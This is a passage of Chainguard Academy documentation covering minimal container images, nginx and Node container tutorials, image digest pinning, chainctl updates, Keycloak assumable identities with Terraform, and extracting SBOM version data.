that’s even smaller still at 2.45 megabytes and the Chainguard static images are roughly the same around two or three megabytes. 1:33 The reason there’s two images here is the latest glibc one is Wolfi based and the latest one is Alpine based, but they’re both practically identical to be honest. 1:46 So next, let’s scan the images for CVEs. 1:50 I’m going to use grype in this case, which is a common scanner and it’s free to use so you can recreate these results. 1:58 So if we look at Debian, Debian does have some vulnerabilities and we can see grype thinks there’s one high, three low and 47 negligible vulnerabilities in this case. 2:13 If we run on Alpine however, grype says there’s no vulnerabilities. 2:29 We run it on Google Distroless. 2:32 It’s the same story and also on the Chainguard static images, there’s zero vulnerabilities. 2:45 So simply by having less in an image, we have a stronger security posture because there’s less attack surface. 2:53 The distroless and Chainguard images take this to an extreme by not even having a shell or package manager in them. 3:01 But if you don’t have a shell or a package manager, how can you do anything with the image? 3:07 And the answer is to use a multistage build. 3:10 So I have an example here, the Dockerfile and you can see it builds a simple go program and copies the result into the Chainguard static image, we can build this with “docker build” and we can see it works. 3:36 But the best thing is, if you look at the size of the image, it’s tiny, it’s only 3.93 megabytes. 3:49 Now there is one final point. 3:52 Some of you are probably thinking we can actually make this even smaller by using the empty scratch image. 3:58 In this case, you’d be right. 4:01 But in a lot of other cases, what you’ll find is that applications require one or two things more. 4:07 For example time zone data or TLS certificates. 4:12 And they often expect certain directories to be available such as /tmp or /etc or /home. 4:19 So the static image provides this and almost nothing else. 4:23 For that reason, if you’re using a tool chain that lets you build statically compiled binaries like rust or go and you want a secure and minimal base. 4:33 It’s really hard to do better than the Chainguard static image. --- ### Getting Started with the nginx Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/nginx/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product The nginx container images maintained by Chainguard include development and production distroless images that are suitable for building and running nginx workloads. Container images tagged with :latest-dev include additional packages to facilitate project development and testing. Container images tagged with :latest strip back these extra packages to provide a secure, production-ready container image. In this tutorial, we will create a local demo website using nginx to serve static HTML content to a local port on your machine. Then we will use the nginx Chainguard Container to build and execute the demo in a lightweight containerized environment. If you’d like, you can watch our Getting Started with the nginx Chainguard Container video as you work through this tutorial, which will walk through the same steps that are detailed here. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Prerequisites You will need to have nginx and Docker Engine installed on your machine to follow along with this demonstration. For this tutorial, you will be copying code to files you create locally. You can find the demo code throughout this tutorial, or you can find the complete demo at the demo GitHub repository. Step 1: Setting up a Demo Website We’ll start by serving static content to a local web server with nginx. With nginx installed, create a directory for your demo. In this guide we’ll call the directory nginxdemo: mkdir ~/nginxdemo/ && cd $_ Within this directory, we will create a data directory to contain our content to be hosted by the web server. mkdir data && cd $_ Using a text editor of your choice, create a new file index.html for the HTML content that will be served. We will use nano as an example. nano index.html The following HTML file displays a graphic of Linky alongside a fun octopus fact. <!DOCTYPE html> <html> <head> <title>Chainguard nginx Demo Website</title> <link rel="stylesheet" href="stylesheet.css"> </head> <body> <h1>nginx Demo Website</h1> <h2>from the <a href="https://edu.chainguard.dev/" target="_blank">Chainguard Academy</a></h2> <img src="linky.png" class="corners" width="250px"> <i><h3>Did you know?</h3></i> <p>The Wolfi octopus is the world's smallest octopus, weighing in on average at less than a gram!</p> <p>They are found near the coastlines of the west Pacific Ocean.</p> </body> </html> Copy this code to your index.html file, save, and close it. Next, create a CSS file named stylesheet.css using the text editor of your choice. We’ll use nano to demonstrate. nano stylesheet.css Copy the following code to your stylesheet.css file. /* Chainguard Academy nginx Demo Website */ body { text-align: center; background-color: #fcebfc; font-family: Arial, sans-serif; } h1 { color: #df45e6; } h2, h3 { color: #9745e6; } p { color: #583ce8 } .corners { border-radius: 10px; } After copying the code into the stylesheet.css file, save and close it. Next, you will pull down the linky.png file using curl. Always inspect the URL before downloading it to ensure it comes from a safe and trustworthy location. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/fb54a9767a5474716398ac33de81d66e263d4c6f/nginx/data/linky.png Now, return to the nginxdemo directory you made earlier. cd ../ Here we will create the nginx.conf configuration file used by nginx to run the local web server. We will demonstrate this using nano. nano nginx.conf Copy the following code into the configuration file you created. In the location directive, be sure to update the configuration to reference the path from root to the data directory you created in a previous step. The file path which you are not using should be commented out using the # symbol to prevent syntax errors. worker_processes 1; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 8080; server_name localhost; charset koi8-r; location / { root /Users/username/nginxdemo/data; # Update the file path for your system #root /home/username/nginxdemo/data; # Linux file path example } } include servers/*; } Once you are finished editing the configuration file, save and close it. Create a new file named mime.types using a text editor of your choice. We will use nano to demonstrate. nano mime.types Copy and paste the following code into your mime.types file. This file will allow nginx to handle the HTML, CSS, and png files we created when rendering the webserver. types { text/html html htm shtml; text/css css; image/png png; } Save and close the mime.types file when you are finished editing it. Next, copy the absolute filepath to the nginx.conf file you created earlier. Replacing the example path with this copied path, execute the following command to initialize the nginx server: nginx -c /Users/username/nginxdemo/nginx.conf Please note that you may encounter some permissions errors when executing this command. You will need to update the permissions of the default nginx logging directory on some systems to proceed. For example, nginx installed with Homebrew stores its log files at /opt/homebrew/var/log/nginx/, while on a Linux machine, the logs are stored in /var/log/nginx/. To update the permissions of these directories, execute the following command, updating the log file path if need be. chmod +wx /opt/homebrew/var/log/nginx/ With the directory permissions updated, you should now be able to initialize the nginx server. To view the HTML content, navigate to localhost:8080 in your web browser of choice. You will see a simple landing page with a picture of Linky and a fun fact about the Wolfi octopus. If you make any changes to the files nginx is serving, run nginx -s reload in your terminal to allow the changes to render. When you are finished with your website, run nginx -s quit to allow nginx to safely shut down. Step 2: Creating the Dockerfile We will now use a Dockerfile to build an image containing the demo. In the nginxdemo directory, create the Dockerfile with the text editor of your choice. We will use nano: nano Dockerfile The following Dockerfile will: Start a new build based on the cgr.dev/chainguard/nginx:latest container image; Note which container port we need to expose for nginx to listen on; Copy the HTML content from the data directory into the image. Copy this content to your own Dockerfile: FROMcgr.dev/chainguard/nginx:latestEXPOSE8080COPY data /usr/share/nginx/html/Save the file when you’re finished. You can now build the container image with: docker build . --pull -t nginx-demo Once the build is complete, run the container image with: docker run -d --name nginxcontainer -p 8080:8080 nginx-demo The -d flag configures our container to run as a background process. The --name flag will name our container nginxcontainer, making it easy to identify from other containers. The -p flag publishes the port that the container listens on to a port on your local machine. This allows us to navigate to localhost:8080 in a web browser of our choice to view the HTML content served by the container. You should see the same HTML page as before, with Linky and an octopus fun fact. If you wish to publish to a different port on your machine, such as 1313, you can do so by altering the command-line argument as shown: docker run -d --name nginxcontainer -p 1313:8080 nginx-demo When you are done with your container, you can stop it with the following command: docker container stop nginxcontainer Advanced Usage In this demo, we did not copy the configuration file into the container image built from the Dockerfile. This is because the default configuration file in the image was sufficient for the scope of this demo. If you wish to use a custom configuration file, you must ensure that file paths, ports, and other system-specific settings are configured to match the container environment. You can find more information about making these changes at the Chainguard nginx Container Overview. If your project requires a more specific set of packages that aren't included within the general-purpose nginx Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### How to Use Container Container Digests to Improve Reproducibility URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/container-image-digests/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Crane Commands used docker pull cgr.dev/chainguard/node docker manifest inspect cgr.dev/chainguard/node@sha256:ede7ef4ca485553f5313f7a02ad3537db1fe337079fc7cfb879f44cf709326db crane digest --full-ref cgr.dev/chainguard/node docker pull cgr.dev/chainguard/node:latest@sha256:ede7ef4ca485553f5313f7a02ad3537db1fe337079fc7cfb879f44cf709326db Dockerfile FROMcgr.dev/chainguard/go:latest@sha256:7e60584b9ae1eec6ddc6bc72161f4712bcca066d5b1f511d740bcc0f65b05949 AS build WORKDIR/srcRUN CGO_ENABLED=0 go build -o /bin/server ./srcFROMcgr.dev/chainguard/static AS prodCOPY --from=build /bin/server /bin/EXPOSE8000ENTRYPOINT [ "/bin/server" ]Transcript 0:05 You might have heard the advice to pin to a digest when using container images. 0:10 But what does this mean? 0:11 Why is it useful and how can you do it? 0:15 So a digest is a content based hash of a unique container image. 0:19 No two container images can have the same digest. 0:23 If you pull an image by the digest, you are guaranteed to get exactly the same image each time. 0:30 And this contrasts with tags like latest or 3.0 which are continually updated and changed. 0:37 So you run pull twice, you might well get a different image. 0:41 And this has implications for reproducibility. 0:46 If images are changing how can I be sure if it works for me it will work for anybody else or myself in the future? 0:52 So what’s the easiest way to get the digest of an image? 0:56 You can run Docker pull and grab it directly from there, for example. 1:02 And you can see the digest right here, but do note that this digest will refer to the index of the image which will list different images for different platforms. 1:15 And most likely this is what you want. 1:18 But we can see what I mean by using the Docker manifest inspect tool. 1:28 And we’ll use this digest and we’ll pipe it through jq. 1:40 And so note that this is the index of the image and it actually lists two more digests that point to actual platform specific images. 1:48 In this case, the arm64 image and the amd64 image. 1:54 If you wanted the image for a specific platform, you could use the address listed here, but not that that might break for some people. 2:02 So make sure you know what you’re doing before using that. 2:06 And I should also mention the crane tool which is a little bit easier to use in scripts as you don’t have to parse the output. If I can spell. 2:16 There we go. 2:18 So here I’ve run crane digest. 2:20 I’ve asked for the full reference which makes it output the beginning part again. 2:24 So we got the digest for the node image as a single line in output. 2:29 And you can also pass a `–platform`` argument which will return the digest for specific platform. 2:38 So I could ask for the arm64 platform and get this digest back. 2:42 OK. 2:43 So now that we have the digest, how can we use it? 2:46 Well, the most obvious way is to just do a Docker pull. 2:53 So here we’ve done a docker pull on node:latest, using this above digest and that works. 3:01 We get back exactly the same image. 3:03 One of the interesting things there and you might have noticed as I went backwards from history is that we can change this tag here. 3:10 It doesn’t, and it turns out Docker or Docker Hub and registries don’t actually care what this tag is when you specify an digest - that part gets ignored. 3:21 So we can put anything at all there and you can use it for metadata. 3:26 But where you’re most likely to use a digest is in the configuration file like a Dockerfile, a compose file or Kubernetes yaml file. 3:35 So I have an example here using the Dockerfile here. 3:39 We’ve pinned the version of the Go compiler. 3:43 And what that means is every time I run the docker build, I’ll be using exactly the same Go compiler. 3:50 So I’m absolutely sure that nothing’s changed in the Go compiler that might cause this build to fail. 3:56 And by using digest in Dockerfiles, we make the whole process much more reproducible; things won’t break because the underlying image has changed in this case. 4:08 And that’s really about it. 4:09 We’ve looked at what our digest is, how you can get it and how you can use it to improve reproducibility. --- ### Find and Update Your chainctl Release Version URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-version-update/ Last Modified: March 6, 2025 Tags: chainctl, version, update, Product This page shows you how to check which release version of chainctl you have installed and how to update to the latest release. For a full reference of all commands with details and switches, see chainctl Reference. View your chainctl version To see which chainctl version you have installed, use: chainctl version This command tells you more than just a release number. ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: v0.2.66 GitCommit: cb0ff7f1806341b20fd72be4769668a1985ed845 GitTreeState: clean BuildDate: 2025-04-09T07:49:51Z GoVersion: go1.24.1 Compiler: gc Platform: linux/amd64 Update your chainctl install To update your chainctl installation to the latest release, use: chainctl update This will present the following: Current version v0.2.66 Latest version 0.2.73 Download URL https://dl.enforce.dev/chainctl/latest/chainctl_linux_x86_64 chainctl filepath /usr/local/bin/chainctl Cache /root/.cache/chainctl Operating System linux Architecture x86_64 Do you want to continue? [Y,n]: Enter Y to proceed and the upgrade will continue and confirm like this: ✔ Download complete! Backing up current chainctl (/usr/local/bin/chainctl) Updating chainctl... Update complete! ⛓ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: v0.2.73 GitCommit: bd6a3e9901c85801697599d72e2646a862570cde GitTreeState: clean BuildDate: 2025-04-22T17:27:55Z GoVersion: go1.24.2 Compiler: gc Platform: linux/amd64 Temporary files may need to be removed manually: rm -f /root/.cache/chainctl/chainctl.bak --- ### Reproducible Dockerfiles with Frizbee and Digestabot URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/digestabot_frizbee/ Last Modified: June 7, 2024 Tags: Chainguard Containers, Product, Video Tools Frizbee Digestabot Transcript I’d like to talk about a problem I faced with container builds in the past and a potential solution. So basically, the problem is you rerun your Docker build, or you reapply your Kubernetes YAML, and it no longer works, even though it was perfectly fine the last time. And it’s because the images your configuration is pointing to have changed, i.e. you’re now pulling different versions of the images. Now, I hit this most when I come back to a project after a few months, but it can really happen at any point. Now, let’s take a look at an example so we can really understand what I’m talking about. OK, so I have a Dockerfile here, and at the moment, it’s broken. It does build, but if I run it, we get an error. And the reason is that the version of Python has changed since it was first built. So if we look at the Dockerfile, we can see it’s a multi-stage build, where the build step is using this latest-dev tag. So that’s a completely up-to-date image with build tool inside it. But the runtime part uses this Python tag, Python latest at a specific digest, which in this case refers to an image from a few months ago. Now, if we change this to use the current latest, rebuild it, and run it, it does work. But because both images are the latest versions, they can change at any point and break again. And if someone else runs this build, there’s no guarantee that it’s going to work. What we should really do is pin both images to digests that we know will work together. And to demonstrate that, I’m going to use this frizbee tool from StackLock. So if I run frizbee on an image, it will go to the registry and ask for the current digest for a tag and update the Dockerfile with the new tag. So if I run frizbee image -n to say dry run, and then Dockerfile, which is the file we’re interested in, we can see what it’s done here. And our latest-dev now has this SHA hash, which is the current SHA hash of the latest-dev image. And our Python latest has changed to this SHA hash. So that’s perfect. You know these two images will work together. And we can output this and build it again. And this should run. Let’s just call it the same thing. Yes. OK. So now I have a Dockerfile with exact image versions that I know will work. But even better, the Python dependencies are specified in this requirements.txt file. And they have exact versions. So I’m actually pretty confident that if I come back to this build in, say, a year’s time, it’s still going to work, with the assumption that the images and the packages are still available to be downloaded. Now, you don’t want to be running versions of software that are a year out of date in production, obviously, as you’re going to find you’re missing important security updates, and your scanners, and maybe even your security team are going to start shouting at you. So you need to update and test your Dockerfile periodically. Now, you can script a solution with Frizbee, but there’s also Digestabot from Chainguard. So Digestabot is a GitHub action that will run regularly and open a PR to update your image references if it finds they’re out of date. What both of these options give you is a high level of reproducibility, along with a simple update mechanism that gives you control over how and when changes are applied. So please take a look at Frizbee and at Digestabot, and let me know how you get on. --- ### Create an Assumable Identity for a CLI session authenticated with Keycloak URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/keycloak-identity/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then assume the identity with the CLI to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Keycloak deployment. Keycloak is an Open Source identity provider which Chainguard provides as an image Creating Terraform Files We will be using Terraform to create an identity for a Keycloak user to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/keycloak-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This organization will contain the identity — which will be created by the keycloak.tf file — to access when we test it out later on. If you aren’t sure of the name of your organization, you can retrieve a list of available organizations with the following command. chainctl iam organizations list -o table Now you can move on to creating the last of our Terraform configuration files, keycloak.tf. keycloak.tf The keycloak.tf file is what will actually create the identity for your CLI to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "keycloak" { parent_id = data.chainguard_group.group.id name = "keycloak" description = <<EOF This is an identity that authorizes Keycloak in this repository to assume to interact with chainctl. EOF claim_match { issuer = "https://<keycloak issuer>" subject = "<keycloak user ID>" audience = "<keycloak audience>" } } First this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named keycloak and has a brief description. The most important part of this section is the claim_match. When the the user tries to assume this identity later on, it must present a token matching the issuer, subject, and audience specified here in order to do so. The issuer is the entity that creates the token, the subject is the entity that the token represents (here, the Keycloak user), and the audience is the intended recipient of the token. In this case, the issuer field points to the realm you are using on your Keycloak server, the issuer of JWT tokens. The audience field will likely be account depending on your Keycloak setup. To discover the issuer, audience, and subject you will need to authenticate with the Keycloak server from the CLI and decode the JWT token returned. There are many ways to authenticate, but here is one example with password authentication: curl --data "grant_type=password&client_id=<client name>&client_secret=<client secret>&username=<user>&password=<password>" https://<DNS NAME>/realms/<realm>/protocol/openid-connect/token | jq -r .access_token | cut -d\. -f2 | sed 's/$/==/' | base64 -d | jq | jq .iss,.aud,.sub The next section of the keycloak.tf file will output the new identity’s id value. This is a unique value that represents the identity itself. output "keycloak-identity" { value = chainguard_identity.keycloak.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.keycloak.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + keycloak-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output a keycloak-ci value. ... Apply complete! Resources: 4 added, 0 changed, 0 destroyed. Outputs: keycloak-identity = "<your actions identity>" This is the identity’s UIDP (unique identity path), which you configured the keycloak.tf file to emit in the previous section. Note this value down, as you’ll need it to authenticate with chainctl. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. Testing the identity From a CLI with the chainctl binary installed and access to the Keycloak server: First, create a pair of environment variables for when you log into Chainguard using the identity. This command generates a JSON Web Token (JWT) by logging in to Keycloak with a username and password and then assigning the token to a variable named ID_TOKEN. export ID_TOKEN=$(curl \ --data "grant_type=password&client_id=<client>&client_secret=<client secret>&username=<user>&password=<password>" \ https://<keycloak URL>/realms/<realm>/protocol/openid-connect/token | jq -r .access_token) Next set a variable named ID to your identity’s UIDP value with the following command. Be sure to replace <identity UIDP> with the identity’s UIDP value, which you noted down in the previous section. export ID=<identity UIDP> After creating these variables, run the following commands to log in to Chainguard under the assumed identity. chainctl auth login \ --identity-token $ID_TOKEN \ --identity $ID chainctl auth configure-docker \ --identity-token $ID_TOKEN \ --identity $ID After logging in, the pipeline will be able to run any chainctl command under the assumed identity. To test out this ability, this configuration runs the chainctl images repos list command to list all available image repositories associated associated with the organization. chainctl images repos list After updating the Keycloak configuration, commit the changes and the pipeline will run automatically. A status box in the dashboard will let you know whether the pipeline runs successfully. If the token times out, chainctl will try to reauthenticate and fail. If you repeat the same login command with the old token you will see messages like this: chainctl auth login --identity-token $ID_TOKEN --identity $ID Error: [101] unable to exchange tokens: rpc error: code = PermissionDenied desc = verifying token: oidc: token is expired (Token Expiry: 2024-03-18 11:44:35 +0000 UTC) To authenticate with chainctl you will need to generate a new token with Keycloak. If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } To retrieve a list of all the available roles, you can run the following command. chainctl iam roles list This command’s output will also include any custom roles you are able to grant. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy identity and the role-binding created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/keycloak-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. For more information about OIDC you can find a lot of documentation on the OpenID Foundation website. For Keycloak specific information, we encourage you to check out the official Keycloak documentation --- ### Getting Software Versions from Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/version-info-chainguard-images/ Last Modified: July 10, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Cosign Commands used cosign download attestation --platform=linux/amd64 \ --predicate-type=https://spdx.dev/Document \ cgr.dev/chainguard/python:latest | jq -r .payload | base64 -d \ | jq -r '.predicate.packages[] | "\(.name) \(.versionInfo)"' docker run cgr.dev/chainguard/wolfi-base ls /var/lib/db/sbom Transcript Hi, I want to record a very short video on how to get software version information out of Chainguard Containers. 0:14 This is particularly useful if you’re using the public tier of Chainguard Containers and only have access to the latest tag and it can be difficult to ascertain the version that this refers to. 0:25 So all Chainguard Containers have an SBOM or Software Bill Of Materials associated with them. 0:31 This is a complex and long document, but we can parse it to extract just the info we are interested in. 0:38 Now the SBOM is stored as an attestation in the container registry. 0:42 And also in the image itself, we can download the SBOM from the registry by using the Cosign tool. 0:50 And let’s look at an example of this. 0:53 So we have this script here. 0:57 And what the script is going to do is download the Linux amd64 version of Python — it’s not going to get the image itself, but it’s actually going to ask for this predicate type which is SPDX, which corresponds to the SBOM type — SPDX is an SBOM standard. 1:18 And once we have that, we’re going to pass it through jq and base64 to decode it. 1:24 And then we’re going to do a little bit more jq to extract the name and version info for each package. 1:33 So let’s see that in action. 1:40 So down at the bottom here, we see the version information for Python, which is the main package we’re interested in and we can see its version 3.11.4-r0. 1:53 But there’s also full information on all the other packages and the image. 1:58 So you can see things like the version of glibc and readline, etc. 2:03 Now, in this case, I just asked for information on the latest tag. 2:07 If you have a downloaded image, you’d want to use a digest of that image to get the correct details from the registry. 2:13 But alternatively, you can get the SBOM data direct from the image itself. 2:19 And let’s take a look at an example of that. 2:24 So what I’ve done here is run ls on the /var/lib/db/sbom directory inside the container and that’s listed a bunch of Jason files, one for each package in the image. 2:39 Now these JSON files are actually SPDX documents, but the file names themselves contain the version info that we’re interested in. 2:47 So we can see this image doesn’t include a lot except busybox and a few system libraries. 2:55 Now, this works because wolfi-base includes a shell — busybox — with the ls command that we ran. But lots of Chainguard images don’t have this. 3:05 So you’ll need to either copy this /var/lib/db/sbom directory out with something like docker cp or use a -dev variant of the image that does include a shell and ls. 3:18 But there you have it two easy ways to get full version info on all packages in a Chainguard Container. 3:25 I hope that was helpful to you. --- ### Getting Started with the Node Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/node/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Node Chainguard Container is a distroless container image that has the tooling necessary to build and execute Node applications, including npm. In this guide, we’ll set up a demo application and create a Dockerfile to build and execute the demo using the Node Chainguard Containers as base. This tutorial requires Docker, Node, and Npm to be installed on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a Demo Application We’ll start by creating a small Node application to serve as a demo. This application uses a mock server to test GET and POST requests, and is based on the Docker Node example. First, create a directory for your app. In this guide we’ll use wolfi-node: mkdir ~/wolfi-node && cd ~/wolfi-node Run the following command to create a new package.json file. npm init -y Exit the init process. You do not need to fill out the metadata as this is a demo. Install npm: npm install Next, install the application dependencies. We’ll need ronin-server and ronin-mocks, which are used together to create a “mock” server that saves JSON data in memory and returns it in subsequent GET requests to the same endpoint. npm install ronin-server ronin-mocks Using your code editor of choice, create a new file named server.js for your application. Here we’ll use nano: nano server.js Copy the following code to your server.js file: const ronin = require('ronin-server') const mocks = require('ronin-mocks') const server = ronin.server() server.use('/', mocks.server(server.Router(), false, true)) server.start() Save the file when you’re done. Then, run the server with: node server.js This command will start the application and wait for connections on port 8000. The mocking server will save any JSON data submitted by a POST request From a new terminal window, run the following command, which will make a POST request to your application sending a JSON payload: curl --request POST \ --url http://localhost:8000/test \ --header 'content-type: application/json' \ --data '{"msg": "testing" }' When the connection is successful, you should get output like this on the terminal that is running the application: 2023-02-07T15:48:54:2450 INFO: POST /test You can now test that the content was saved by running a GET request to the same endpoint: curl http://localhost:8000/test You’ll get output similar to this: 